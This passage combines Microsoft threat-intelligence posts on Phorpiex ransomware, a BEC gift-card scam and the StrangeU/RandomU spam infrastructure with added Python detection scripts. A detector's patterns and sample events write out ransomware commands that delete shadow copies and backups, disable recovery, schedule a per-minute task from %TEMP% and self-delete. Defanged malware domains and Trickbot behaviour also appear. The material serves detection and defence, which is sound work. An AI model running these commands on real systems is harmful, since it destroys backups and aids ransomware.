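        r"vssadmin(\.exe)?\s+delete\s+shadows"
        r"|wmic(\.exe)?\s+shadowcopy"
        r"|wbadmin\s+delete\s+systemstatebackup"
        r"|bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)",
        re.IGNORECASE),
    "per_minute_task_from_temp": re.compile(
        r"schtasks\s+/create\b.*\s/sc\s+minute\s+/mo\s+1\b.*\s/tr\s+\S*(%temp%|\\temp)\\",
        re.IGNORECASE),
    "ping_delay_then_self_delete": re.compile(
        r"ping\s+\S+\s+-n\s+\d+(\s+-w\s+\d+)?\s*>\s*nul\s*&\s*del\s+/f", re.IGNORECASE),
    "removable_drive_worm_launch": re.compile(
        r"start\s+__\s*&\s*__\\drivemgr\.exe", re.IGNORECASE),
    "config_read_via_notepad_or_wuapp": re.compile(
        r'(notepad|wuapp)(\.exe)?"?\s+-c\s+"?[a-z]:\\programdata\\', re.IGNORECASE),
}


def match_rules(command_line):
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, pattern in RULES.items() if pattern.search(command_line)]


def scan(events):
    """Return (pid, image, matched rule names) for events that fire at least one rule."""
    hits = []
    for event in events:
        matched = match_rules(event["command_line"])
        if matched:
            hits.append((event["pid"], event["image"], matched))
    return hits


# Constructed process-creation events (Sysmon Event ID 1 shape, simplified).
SAMPLE_EVENTS = [
    {"pid": 4101, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c vssadmin.exe Delete Shadows /All /Quiet"},
    {"pid": 4102, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c bcdedit.exe /set {default} recoveryenabled No"},
    {"pid": 4103, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest"},
    {"pid": 4104, "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r"schtasks /create /sc minute /mo 1 /tn WindowsUpdate /tr %TEMP%\System.exe"},
    {"pid": 4105, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /C ping 10.0.0.5 -n 8 -w 3000 > Nul & Del /f /q '
                     r'"C:\ProgramData\PnQssBdbSh\winsysdrv.exe" & "C:\Users\alice\AppData\Local\Temp\winsysdrv.exe"'},
    {"pid": 4106, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"cmd.exe" /c start __ & __\DriveMgr.exe & exit'},
    {"pid": 4107, "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r'"notepad.exe" -c "C:\ProgramData\PnQssBdbSh\cfg"'},
    # Benign look-alikes that must not fire.
    {"pid": 4201, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c ping 10.0.0.1 -n 1"},
    {"pid": 4202, "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
    {"pid": 4203, "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r"schtasks /create /sc daily /tn NightlyBackup /tr C:\Tools\backup.exe"},
]

if __name__ == "__main__":
    for pid, image, matched in scan(SAMPLE_EVENTS):
        print(pid, image, matched)
```

The backup-deletion rule is the one worth paging on by itself, since the post notes the same command sequence is shared by most ransomware; the others are stronger as context for a Phorpiex infection than as stand-alone alerts, because notepad.exe and schtasks.exe are ordinary on any workstation.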

Microsoft Defender for Endpoint detects and blocks the ransomware. It also detects and raises the following alerts for the encryption and backup deletion behaviors, enabling security operations teams to be notified and immediately respond to ransomware activity in their environment:

  • Ransomware behavior detected in the file system
  • File backups were deleted

We have observed that the external commands and behaviors of the Avaddon ransomware have largely remained the same since its introduction in June-July 2020. This includes the tendency to masquerade as the system file Taskhost.exe. Avaddon, which demands a ransom in Bitcoin equivalent to $700, is still active today and being actively distributed by Phorpiex using new bot loaders that are not substantially different in behavior. Microsoft Defender for Endpoint continues to provide durable protection against these new campaigns.

Other ransomware is slightly less common lately, but in December 2020, a non-weaponized version of Knot ransomware was staged on Phorpiex-operated servers. It did not seem to have caused any infections yet, as this may have been a test version. This ransomware shares a high degree of similarity with the Phorpiex loader itself, and improved versions have not yet been seen. Like Avaddon, Knot typically demands relatively small sums of money in Bitcoin, equivalent to $350. The ransom notes generally require Bitcoin payment to a wallet, though no payments seem to have been made that month.

Line graph showing daily amount of cryptocurrency in a particular cryptocurrency address

Figure 8. Cryptocurrency profit volume from a single wallet attached to a Knot ransomware sample in early 2021, showing no payments of the asking price. Data from BitInfoCharts.

Defending against botnets and associated activity

Botnets drive a huge portion of the malware economy, and as the resilience of Phorpiex shows, they evolve to adapt to the ever-changing threat environment. Our many years of experience analyzing, monitoring, and even working with law enforcement and other partners to take down botnets tell us that alternative infrastructures rise as attackers try to fill in the void left by disrupted botnets. Typically, new infrastructures are born as a result of these movements, but in the case of Phorpiex, an established botnet adapts and takes over.

The wide range of malicious activities associated with botnets, as we detailed in this in-depth research into Phorpiex, represents the spectrum of threats that organizations face today: various attack vectors, multiple spreading mechanisms, and a diverse set of payloads that attackers can change at will. To combat these threats, organizations need security solutions that deliver cross-domain visibility and coordinated defense.

Microsoft 365 Defender leverages the capabilities and signals from the Microsoft 365 security portfolio to correlate threat data from endpoints, email and data, identities, and cloud apps to provide comprehensive protection against threats. Microsoft Defender for Endpoint detects and blocks malware, other malicious artifacts, and malicious behavior associated with botnet activity, as well as the deployment of secondary payloads like cryptocurrency miners and ransomware. Features like attack surface reduction, tamper protection, and security controls for removable media further help prevent these attacks and harden networks against threats in general. Microsoft Defender for Office 365 detects the malicious attachments and URLs in emails generated by the mailing operations of the Phorpiex botnet.

Our industry-leading visibility informs AI and machine learning technologies that power the automatic prevention, detection, and remediation of threats, as well as the rich set of investigation tools available to defenders for hunting, analyzing, and resolving attacks. The unified Microsoft 365 Defender security center, which recently became generally available, integrates capabilities so defenders can manage all endpoint, email, and cross-product investigations, configuration, and remediation from a single portal.

Our understanding of how botnets operate and evolve, through in-depth research like this, further enriches our ability to continue delivering defenses against the threats of today and the future. Learn how Microsoft 365 Defender stops attacks with automated, cross-domain security and built-in AI.

 

Microsoft 365 Defender Threat Intelligence Team

 

The post Phorpiex morphs: How a longstanding botnet persists and thrives in the current threat environment appeared first on Microsoft Security.

Business email compromise campaign targets wide range of orgs with gift card scam

May 6th, 2021

Cybercriminals continue to target businesses to trick recipients into approving payments, transferring funds, or, in this case, purchasing gift cards. This kind of email attack is called business email compromise (BEC)—a damaging form of phishing designed to gain access to critical business information or extract money through email-based fraud.

In this blog, we want to share our investigation of a BEC campaign that used attacker-created email infrastructure to facilitate gift card theft. In this campaign, we found that attackers targeted organizations in the consumer goods, process manufacturing and agriculture, real estate, discrete manufacturing, and professional services sectors using typo-squatted domains to make the emails appear as if they were originating from valid senders.

BEC emails are intentionally designed to look like ordinary emails, appearing to come from someone the targeted recipient already knows, but these campaigns are more complex than they appear. They require behind-the-scenes operations, preparation, and staging. Advanced email solutions like Microsoft Defender for Office 365 detect and block these elusive threats. Defender for Office 365 safeguards organizations against the threat posed by emails and URLs associated with BEC campaigns.

In our blog titled Business email compromise: How Microsoft is combating this costly threat, we wrote about the process of orchestrating BEC attacks and discussed Microsoft strategies to combat these threats. Additionally, Microsoft released a three-part blog series on BEC scams titled Business Email: Uncompromised, which offers an in-depth look into the evolution of BEC attacks and how Microsoft Defender for Office 365 employs multiple native capabilities to help customers defend against them.

Understanding the BEC gift card scam

Imagine this work-from-home scenario for an executive assistant (EA):

It’s a typical day at work for you as a remote EA. You prepare your to-do list for the day and check your CEO’s calendar for their scheduled meetings, all while communicating with other EAs via email and chat. You categorize your emails and prioritize your tasks—nothing out of the ordinary.

In the middle of the workday, you get an email appearing to come from your boss, requesting that you purchase gift cards to give to the team as an incentive for their hard work during the pandemic.

The request seems a little strange, you think. Maybe it was a spur-of-the-moment initiative. But you’re a rock star assistant and decide to go ahead and purchase the gift cards using department funds.

You reply to your boss’s email with the gift card codes. After not hearing back for a while, you finally ping them on chat to make sure they received the codes. Your boss expresses their confusion in response to your chat message: they never requested gift cards for the team.

This is a classic business email compromise (BEC) scenario.

Defining BEC attacks

BEC is a type of phishing attack that targets organizations, with the goal of stealing money or critical information. Our blog post Business Email: Uncompromised – Part One provides examples of real-world BEC attacks and how to identify key visual cues for spotting attacks.

The emails used in BEC attacks appear simple, but there is a wide level of complexity behind them—from reconnaissance and targeting, social engineering, to the delivery infrastructure.

If you’re wondering why such complex threats are crafted for a seemingly insignificant payout, think again. BEC remains a serious concern, with attacks totaling approximately $1.8 billion in victim losses in 2020, according to the FBI’s Internet Crime Complaint Center (IC3). While attacks similar to the BEC gift card scenario we described earlier can add up to a hefty sum, many BEC attackers are known to target significantly larger transactions, such as intercepting and redirecting wire transfers, ultimately making BEC scams a highly profitable cybercriminal operation.

Conducting reconnaissance, social engineering for BEC attacks

For BEC actors to know who to target and who to impersonate, they frequently conduct reconnaissance prior to launching attacks. Social media sites, “about us” pages on a company’s website, or news articles about a targeted company may all give actors the information they need to craft a specific, believable message intended for a chosen victim. In our blog post, Business Email: Uncompromised – Part Two, we discuss the multiple stages of a BEC attack, from identifying target organizations to the attackers setting up transaction details.

BEC gift card campaign seen targeting various organizations

In this campaign, attackers targeted a variety of companies in the consumer goods, process manufacturing and agriculture, real estate, discrete manufacturing, and professional services sectors.

Figure 1. Breakdown of email volume sent to the top targeted industries we observed in this BEC campaign

This specific campaign started with an extremely vague request, such as “I need you to do a task for me” or “Let me know if you’re available.” The message body contained a few details related to the target to make the email seem legitimate.

Figure 2. A sample BEC email impersonating an executive

In the Figure 2 screenshot, the attacker signed the email as “Steve,” which is the name of an executive at this targeted organization. Additionally, the email was addressed to someone who worked with the impersonated executive while the subject line contained the recipient’s first name.

If the recipient replied to the email, the attacker responded with a more specific demand for a gift card. In other cases, attackers skipped the generic email altogether and jumped directly to the gift card demand, using a method of generating fake replies to add legitimacy to the email. We discussed the anatomy of BEC attacks in this blog post and detailed telltale signs of common phishing techniques.

Figure 3. A sample BEC email targeting the education sector demanding a gift card purchase

In this case, the attacker pretended to be a teacher at a K-12 institution and claimed that they were unable to leave their house to buy a gift card. In addition, the email subject line contained the name of the purported teacher followed by “SICK”.

The email body included a message requesting the recipient to purchase a physical gift card for them. According to our past BEC research, attackers frequently used the stolen gift card codes for websites that allow them to redeem and convert gift cards to cryptocurrency or other foreign currencies. The funds generated from cashing out gift cards can then be transferred to attacker-owned accounts untraceably.

In this campaign, we noticed that the email also contained a fake reply, wherein the threat actor included what appeared to be an original message in the email body, with the subject line starting with “Re:”. The ‘From’ email address in the crafted original message used yahoo.com, but the ‘From’ address of the actual email was a typo-squatted domain spoofing yahoo.com, hinting that the email reply was indeed fake.

Figure 4. The attacker used a typo-squatted domain that spoofed a Yahoo account

Upon closer examination, the actors had taken the extra step of faking the In-Reply-To and References headers, which added an extra air of legitimacy to the email. An email’s In-Reply-To header contains the unique Message ID of the previous message in the reply thread, and the References header contains the unique Message IDs from all previous messages in the reply thread. In a typical email that is not a reply, these two header fields would be blank.

Figure 5. Spoofed fields for the In-Reply-To and References headers

As shown in Figure 5, both the In-Reply-To and References headers are populated with Message IDs associated with legitimate email providers, including yahoo.com, which this campaign spoofed. That these headers were manually added by the attacker is made apparent by the ya00h0o.com sender. In addition, the email’s HTML contents show that the message was manually typed to appear as though it’s a reply.

Filling in these headers made the email appear legitimate, as if the attacker were simply replying to an existing email thread between the Yahoo and Outlook user. This characteristic sets this campaign apart from most BEC campaigns, where attackers simply include a real or specially crafted fake email, adding the sender, recipient, and subject in the new email body, to make it appear as though the new email was a reply to the previous one.

Delivery infrastructure

For this campaign, attackers registered typo-squatted domains for over 120 different organizations to impersonate actual businesses. We observed patterns of using the correct domain name but an incorrect TLD, or slightly misspelling the company name. These domains were registered just days before this email campaign began.

We noted that these domains did not have domain privacy enabled, nor were they under the EU’s GDPR protections. Each domain used a unique registrant name and email. The registrant names appeared to be autogenerated random first names and last names, and the registrant contact email used a free email service such as Gmail or mail.com with accounts that were often simply <first name>.<last name>@gmail.com or similar. Each name was used to register just one domain used in the campaign, which made pivoting to related domains more challenging.

Another observation about this campaign is that the registered domains did not always align with the organization being impersonated in the email. This could have been a mistake on the actor’s part, as BEC domains are typically designed to closely mimic the impersonated organization. For example, an actor may register microsoft.xyz or micrrosoft.com, both of which would normally be used to send emails pretending to originate from Microsoft. In this campaign, those types of homoglyphed and typo-squatted domains were used to send emails pretending to originate from a variety of organizations.
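The two tells described above (a fabricated reply thread signalled by populated In-Reply-To and References headers, and a sender domain that is a typo-squat of a legitimate one) can be checked together in a mail-filter rule. The following Python script is an added example, not code from the original post or from Microsoft. The domains ya00h0o.com, yahoo.com, microsoft.xyz and micrrosoft.com are taken from the post; the sample message, the list of known domains, the homoglyph table and the edit-distance threshold are constructed assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Domains the filter treats as legitimate. Constructed list: a real deployment
# would load the organisation's own partner domains plus common mail providers.
KNOWN_DOMAINS = ["yahoo.com", "outlook.com", "gmail.com", "microsoft.com"]

# Digits that attackers substitute for visually similar letters (assumed table).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})

def split_domain(domain):
    """Return (name, tld) for a domain such as 'micrrosoft.com'."""
    parts = domain.lower().rstrip(".").split(".")
    return ".".join(parts[:-1]), parts[-1]

def levenshtein(a, b):
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_lookalike(domain, known=KNOWN_DOMAINS):
    """Return (impersonated_domain, reason) or (None, None).

    Covers the patterns the post describes: the correct name with the wrong
    TLD (microsoft.xyz), homoglyph substitution, and small misspellings
    (micrrosoft.com, ya00h0o.com)."""
    domain = domain.lower()
    if domain in known:
        return None, None
    name, tld = split_domain(domain)
    normalised = name.translate(HOMOGLYPHS)
    for legit in known:
        legit_name, legit_tld = split_domain(legit)
        if name == legit_name and tld != legit_tld:
            return legit, "wrong-tld"
        if normalised == legit_name:
            return legit, "homoglyph"
        distance = levenshtein(normalised, legit_name)
        if 0 < distance <= 2 and len(legit_name) >= 5:  # threshold is a tuning choice
            return legit, f"typo-squat (edit distance {distance})"
    return None, None

# Constructed message modelled on Figures 4 and 5: a fabricated reply whose
# In-Reply-To/References cite real providers while the sender is a look-alike.
SAMPLE_EMAIL = """\
From: "Steve" <steve@ya00h0o.com>
To: assistant@example.com
Subject: Re: quick task
Message-ID: <9999@ya00h0o.com>
In-Reply-To: <1234.abc@mail.yahoo.com>
References: <1234.abc@mail.yahoo.com> <5678.def@outlook.com>

Are you available? Let me know.
"""

def assess_reply_claim(raw):
    """Combine the reply-thread signal with the look-alike sender check."""
    msg = message_from_string(raw)
    _, addr = parseaddr(msg.get("From", ""))
    sender_domain = addr.rpartition("@")[2].lower()
    thread_headers = (msg.get("In-Reply-To") or "") + " " + (msg.get("References") or "")
    referenced = sorted(set(re.findall(r"@([A-Za-z0-9.-]+)>", thread_headers)))
    impersonated, reason = classify_lookalike(sender_domain)
    claims_reply = bool(referenced)
    if impersonated and claims_reply:
        verdict = "suspicious: fabricated reply thread from look-alike domain"
    elif impersonated:
        verdict = "suspicious: look-alike sender domain"
    else:
        verdict = "no finding"
    return {"sender_domain": sender_domain, "claims_reply": claims_reply,
            "referenced_domains": referenced, "impersonates": impersonated,
            "reason": reason, "verdict": verdict}

if __name__ == "__main__":
    print(assess_reply_claim(SAMPLE_EMAIL))
    print(classify_lookalike("microsoft.xyz"), classify_lookalike("micrrosoft.com"))
```

A cross-provider reply is normal, so referenced Message-ID domains that differ from the sender are not flagged on their own; the verdict only becomes suspicious when the sender domain itself is a look-alike. The edit-distance threshold of 2 will need a longer allow-list in production to avoid flagging short legitimate names.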

Our in-depth research into this campaign’s delivery infrastructure directly informed the protection Microsoft provides against this BEC threat.

How Microsoft security solutions combat BEC campaigns

Microsoft Defender for Office 365 defends organizations against malicious threats posed by this BEC campaign.

For a better understanding of how Defender for Office 365 protects against BEC attacks, you can refer to our blog post about detecting user and domain impersonation at scale in a fast-evolving attack landscape. Email authentication in Defender for Office 365 allows you to verify whether email messages from a sender are legitimate and come from expected sources for that email domain. Email standards like SPF, DKIM, and DMARC are evaluated by Office 365 to prevent domain spoofing. Our spoof intelligence technology uses advanced algorithms to observe the sending patterns of domains and flag anomalies.

You can strengthen your security posture further by empowering employees through user awareness tools in Defender for Office 365 that are integrated into products like Outlook and Office 365 apps. For instance, attack simulation training in Defender for Office 365 allows you to craft and run realistic BEC-like attack scenarios in your organization.

As these threats are always changing and evolving, Microsoft has dedicated research teams who constantly stay abreast of the changing threat landscape and combine that knowledge with our extensive customer telemetry data to stay current on BEC and other attacks.

Microsoft’s portfolio of security products processes trillions of signals every day. This signal base drives constant improvements to the artificial intelligence layers backing our protection and detection systems. Microsoft threat analysts leverage these signals to track actors, infrastructure, and techniques used in phishing and BEC attacks to ensure Defender for Office 365 stays ahead of current and future threats.

Defender for Office 365 equips security operations teams with automated threat investigation and response capabilities to understand, simulate, and prevent email-related threats. Defender for Office 365 enables you to define threat protection policies to set up the appropriate level of protection for your organization, while allowing you to view and monitor real-time reports. Learn more about Microsoft Defender for Office 365.

 

 Microsoft 365 Defender Threat Intelligence Team

The post Business email compromise campaign targets wide range of orgs with gift card scam appeared first on Microsoft Security.

What tracking an attacker email infrastructure tells us about persistent cybercriminal operations

February 1st, 2021

From March to December 2020, we tracked segments of a dynamically generated email infrastructure that attackers used to send more than a million emails per month, distributing at least seven distinct malware families in dozens of campaigns using a variety of phishing lures and tactics. These campaigns aimed to deploy malware on target networks across the world, with notable concentration in the United States, Australia, and the United Kingdom. Attackers targeted the wholesale distribution, financial services, and healthcare industries.

By tracing these campaigns, we uncovered a sprawling infrastructure that is robust enough to seem legitimate to many mail providers, while flexible enough to allow the dynamic generation of new domain names and remain evasive. Shared IP space, domain generation algorithm (DGA) patterns, subdomains, registrations metadata, and signals from the headers of malicious emails enabled us to validate our research through overlaps in campaigns where attackers utilized multiple segments of purchased, owned, or compromised infrastructure. Using the intelligence we gathered on this infrastructure, we were at times able to predict how a domain was going to be used even before campaigns began.

This email infrastructure and the malware campaigns that use it exemplify the increasing sophistication of cybercriminal operations, driven by attackers who are motivated to use malware infections for more damaging, potentially more lucrative attacks. In fact, more recent campaigns that utilized this infrastructure distributed malware families linked to follow-on human-operated attacks, including campaigns that deployed DoppelPaymer, Makop, Clop, and other ransomware families.

Our deep investigation into this infrastructure brings to light these important insights about persistent cybercriminal operations:

  • Tracking an email infrastructure surfaces patterns in attacker activity, bubbling up common elements in seemingly disparate campaigns
  • Among domains that attackers use for sending emails, distributing malware, or command-and-control, the email domains are the most likely to share basic registration similarities and more likely to use DGA
  • Malware services rely on proxy providers to make tracking and attribution difficult, but the proxies themselves can provide insights into upcoming campaigns and improve our ability to proactively protect against them
  • Gaining intelligence on email infrastructures enables us to build or improve proactive and comprehensive protections like those provided by Microsoft Defender for Office 365 to defend against some of the world’s most active malware campaigns

While there is existing in-depth research into some of these specific campaigns, in this blog we’ll share more findings and details on how email distribution infrastructures drive some of the most prevalent malware operations today. Our goal is to provide important intelligence that hosting providers, registrars, ISPs, and email protection services can use and build on to protect customers from the threats of today and the future. We’ll also share insights and context to empower security researchers and customers to take full advantage of solutions like Microsoft Defender for Office 365 to perform deep investigation and hunting in their environment and make their organizations resilient against attacks.

The role of for-sale infrastructure services in the threat ecosystem

We spotted the first segment of the infrastructure in March, when multiple domains were registered using distinct naming patterns, including the heavy use of the word “strange”, inspiring the name StrangeU. In April, a second segment of the infrastructure, one that used a domain generation algorithm (DGA), began registration as well. We call this segment RandomU.

The emergence of this infrastructure in March dovetailed with the disruption of the Necurs botnet that resulted in the reduction of service. Before being disrupted, Necurs was one of the world’s largest botnets and was used by prolific malware campaign operators such as those behind Dridex. For-sale services like Necurs enable attackers to invest in malware production while leasing the delivery components of their activities to further obfuscate their behavior. The StrangeU and RandomU infrastructure appear to fill in the service gap that the Necurs disruption created, proving that attackers are highly motivated to quickly adapt to temporary interruptions to their operations.

Graph showing timeline of the Necurs takedown and the staging and operation of StrangeU and RandomU

Figure 1. Timeline of staging and utilization of the email infrastructure

At first, the new email infrastructure was used infrequently in campaigns that distributed highly commodity malware like Mondfoxia and Makop. Soon, however, it attracted the attention of Dridex and Trickbot operators, who began using the infrastructure for portions of their campaigns, sometimes entirely and sometimes mixed with other compromised infrastructure or email providers.

Analyzing these mail clusters provides insight into how human-driven the tangled web of modular attacker infrastructure remains. From the unifying key traits in registration and behavior to the simple and effective techniques used across the wide variety of malware, the attackers’ goal in this diversification points toward defeating automated analysis. However, these same shared characteristics and methods translate into insights that inform resilient protections defending customers against these attacks.

Domain registration and email infrastructure staging

On March 7, 2020, attackers began registering a series of domains with Namecheap using sets of stolen email addresses, largely from free email services like mail.com, mail.ru, list.ru, and others. These domains all had similar characteristics that could be linked back to various similarities in registration. Almost all of the registered domains contained the word “strange” and were under the .us TLD, hence the name StrangeU. The choice of the .us TLD also meant that no domain or WHOIS privacy service, which attackers often use to obfuscate domain ownership and provenance, could be applied, because such services are prohibited for this TLD.

To circumvent tracking and detection of these domains, attackers used false registration metadata. However, there was heavy crossover in the fake names and email addresses, allowing us to find additional domain names, some of which could be tied together using other keywords as shown in the list below, and fingerprint the domain generation mechanism.

The StrangeU domains were registered in early March 2020 and operated in continuous small bursts until April, when they were used for a large ransomware campaign. Following that, a new campaign occurred fairly regularly every few weeks. Registration of new domains continued throughout the year, and in September, the StrangeU infrastructure was used in conjunction with a similar infrastructure to deliver Dridex, after which these domains were used less frequently.

This second mailing segment, RandomU, employed a different DGA mechanism but still utilized Namecheap and showed a more consistent through line of registration metadata than its StrangeU counterpart. This infrastructure, which surfaced in April, was used infrequently through the spring, with surges in May and July. After the Dridex campaign in September in which it was used along with StrangeU, it has been used in two large Dridex campaigns every month.
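As an added example (not code from the post), here is the kind of registration pivot described above, in Python: constructed WHOIS-style records are clustered by reused registrant names and e-mail addresses, and each domain is labelled by its naming pattern. The StrangeU rule (the word “strange” under .us) follows the post; the vowel-ratio test for random-looking labels is an assumed, generic DGA heuristic, since the post does not describe RandomU’s algorithm. Only ereceivedsstrangesecureworld.us, Namecheap, and the mail.ru, list.ru and mail.com providers come from the post; the registrant names, addresses and the other domains are made up.

```python
import math
from collections import Counter, defaultdict

# Constructed registration records in the shape of a WHOIS/RDAP export:
# (domain, registrar, registrant name, registrant e-mail). Only the first
# domain and the registrar/mail-provider names come from the post; the
# registrant names, e-mail addresses and other domains are made up.
RECORDS = [
    ("ereceivedsstrangesecureworld.us", "Namecheap", "Pavel Orlov", "p.orlov@mail.ru"),
    ("strangemailworldsecure.us",       "Namecheap", "Pavel Orlov", "other@list.ru"),
    ("securestrangedelivery.us",        "Namecheap", "Anna Kovac",  "other@list.ru"),
    ("xkq7v2mzpl.us",                   "Namecheap", "Ivan Novak",  "ivan.novak@mail.com"),
    ("tq9zlwxkvb.us",                   "Namecheap", "Ivan Novak",  "ivan.novak@mail.com"),
    ("example-shop.com",                "OtherReg",  "Jane Doe",    "jane@example.com"),
]

VOWELS = set("aeiou")

def naming_features(domain):
    """Cheap lexical features of the registrable label."""
    sld, tld = domain.lower().rsplit(".", 1)
    counts = Counter(sld)
    entropy = -sum(n / len(sld) * math.log2(n / len(sld)) for n in counts.values())
    letters = [c for c in sld if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / max(len(letters), 1)
    return {"sld": sld, "tld": tld, "has_strange": "strange" in sld,
            "entropy": round(entropy, 2), "vowel_ratio": round(vowel_ratio, 2)}

def label_segment(domain):
    """StrangeU is identified exactly as the post describes (the word
    "strange" under .us). The vowel-ratio test for random-looking labels is
    an assumed generic DGA heuristic, not the post's description of RandomU."""
    f = naming_features(domain)
    if f["has_strange"] and f["tld"] == "us":
        return "StrangeU-like"
    if len(f["sld"]) >= 8 and f["vowel_ratio"] < 0.2:
        return "random-looking (possible DGA)"
    return "unclassified"

def cluster_by_registrant(records):
    """Pivot: join domains whose registrations reuse a registrant name or
    e-mail, the crossover the post used to find further StrangeU domains."""
    by_key = defaultdict(set)
    for domain, _registrar, name, email in records:
        by_key[("name", name.lower())].add(domain)
        by_key[("email", email.lower())].add(domain)
    neighbours = defaultdict(set)
    for domains in by_key.values():
        for d in domains:
            neighbours[d] |= domains
    clusters, seen = [], set()
    for domain, *_ in records:
        if domain in seen:
            continue
        component, stack = set(), [domain]
        while stack:  # depth-first walk over the shared-attribute graph
            d = stack.pop()
            if d not in component:
                component.add(d)
                stack.extend(neighbours[d] - component)
        seen |= component
        clusters.append(sorted(component))
    return clusters

def report(records):
    """One entry per cluster: its domains and the naming patterns they show."""
    return [(cluster, sorted({label_segment(d) for d in cluster}))
            for cluster in cluster_by_registrant(records)]

if __name__ == "__main__":
    for cluster, labels in report(RECORDS):
        print(labels, cluster)
```

Two of the three StrangeU domains share only an e-mail address and two share only a name, so neither attribute alone links all three; walking the shared-attribute graph does, which is the point of the pivot.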

Table listing observed patterns in StrangeU and RandomU infrastructures

Figure 2. Common patterns in domains belonging to the email infrastructure

The StrangeU and RandomU segments of domains paint a picture of supplementary modular mailing services that allowed attackers to launch region-specific and enterprise-targeting attacks at scale, delivering over six million emails. The two segments carried a standard barrage of mailing subdomains: over 60 unique subdomains referencing email across the clusters, consistent between the two segments, with each domain having four to five subdomains. The following is a sample of the malware campaigns, some of which we discuss in detail in succeeding sections, for which we observed this infrastructure being used:

  • Korean spear-phishing campaigns that delivered Makop ransomware in April and June
  • Emergency alert notifications that distributed Mondfoxia in April
  • Black Lives Matter lure that delivered Trickbot in June
  • Dridex campaign delivered through StrangeU and other infra from June to July
  • Dofoil (SmokeLoader) campaign in August
  • Emotet and Dridex activities in September, October, and November

Timeline of campaigns using the StrangeU and RandomU infrastructures

Figure 3. Timeline of campaigns that used StrangeU and RandomU domains

Korean spear-phishing delivers Makop ransomware (April and June 2020)

In early April, StrangeU was used to deliver the Makop ransomware. The emails were sent to organizations that had major business operations in Korea and used names of Korean companies as display names. Signals from Microsoft Defender for Office 365 indicated that these campaigns ran in short bursts.

The emails had .zip attachments containing executables with file names that resembled resumes from job seekers. Once a user opened the attachments, the executables delivered Makop, a ransomware-as-a-service (RaaS) payload that targeted devices and backups.

Upon infection, the malware quickly used the WMI command-line (WMIC) utility to delete shadow copies. It then used the BCDEdit tool to alter the boot configuration to ignore future failures and prevent restoration, before encrypting all files and renaming them with .makop extensions.

The second time we observed the campaign almost two months later, in early June, the attackers used a Makop ransomware variant with many modified elements, including added persistence via scripts in the Startup folder before triggering a reboot.

Nearly identical attempts to deliver Makop using resume-based lures were covered by Korean security media during the entire year, using popular mail services through legitimate vendors like Naver and Hanmail. This could indicate that during short bursts the Makop operators were unable to launch their campaigns through legitimate services and had to move to alternate infrastructures like StrangeU instead.

Black Lives Matter lure delivers Trickbot (June 2020)

One campaign associated with the StrangeU infrastructure gained notoriety in mid-June for its lure as well as for delivering the notorious info-stealing malware Trickbot. This campaign circulated emails with malicious Word documents claiming to seek anonymous input on the Black Lives Matter movement.

An initial version of this campaign was observed on June 10 sending emails from a separate, unique attacker-owned mailing infrastructure using .monster domains. However, in the next iteration almost two weeks later, the campaign delivered emails from various domains specifically created with the Black Lives Matter signage, interspersed with StrangeU domains:

  • b-lives-matter[.]site
  • blivesm[.]space
  • blivesmatter[.]site
  • lives-matter-b[.]xyz
  • whoslivesmatter[.]site
  • lives-m-b[.]xyz
  • ereceivedsstrangesecureworld[.]us
  • b-l-m[.]site

Both campaigns carried the same Trickbot payload, operated for two days, and used identical post-execution commands and callouts to compromised WordPress sites.

Once a user opened the document attachment and enabled the malicious macro, Word launched cmd.exe with the command “/c pause” to evade security tools that monitored for successive launches of multiple processes. It then launched commands that deleted proxy settings in preparation for connecting to multiple C2 IP addresses.

Screenshot of malicious document

Figure 4. Screenshot of the malicious document used to deliver Trickbot

The commands also launched rundll32.exe, a native binary commonly used as a living-off-the-land binary, to load a malicious file in memory. The commandeered rundll32.exe also proceeded to perform other tasks using other living-off-the-land binaries, including wermgr.exe and svchost.exe.

In turn, the hijacked wermgr.exe process dropped a file with a .dog extension that appeared to be the Trickbot payload. The same instance of wermgr.exe then appeared to inject code into svchost.exe and scanned for open SMB ports on other devices. The commandeered svchost.exe used WMI to open connections to additional devices on the network, while continuing to collect data from the initial infected device. It also opened multiple browsers on localhost connections to capture browser history and other information via esentutl.exe and grabber_temp.edb, both of which are often used by the Trickbot malware family.

This campaign overwhelmingly targeted corporate accounts in the United States and Canada and avoided individual accounts. Despite heavy media coverage, this campaign was relatively small, reflecting a common behavior among cybercrime groups, which often run multiple, dynamic low-volume campaigns designed to evade resilient detection.

Dridex campaigns big and small (June to July 2020 and beyond)

From late June through July, Dridex operators ran numerous campaigns that distributed Excel documents with malicious macros to infect devices. These operators first delivered emails through the StrangeU infrastructure only, but they quickly started to use compromised email accounts of legitimate organizations as well, preventing defenders from easily blocking deliveries. Despite this, emails from either StrangeU or the compromised accounts had overlapping attributes. For example, many of the emails used the same Reply-To addresses, which were sourced from compromised individual accounts and were not consistent with the sender addresses.

During the bulk of this run, Excel files were attached directly in the email in order to eventually pull the Dridex payload from .xyz domains such as those below. The attackers changed the delivery domains every few days and connected to IP-based C2s on familiar ports like 4664, 3889, 691, and 8443:

  • yumicha[.]xyz
  • rocesi[.]xyz
  • secretpath[.]xyz
  • guruofbullet[.]xyz
  • Greyzone[.]xyz

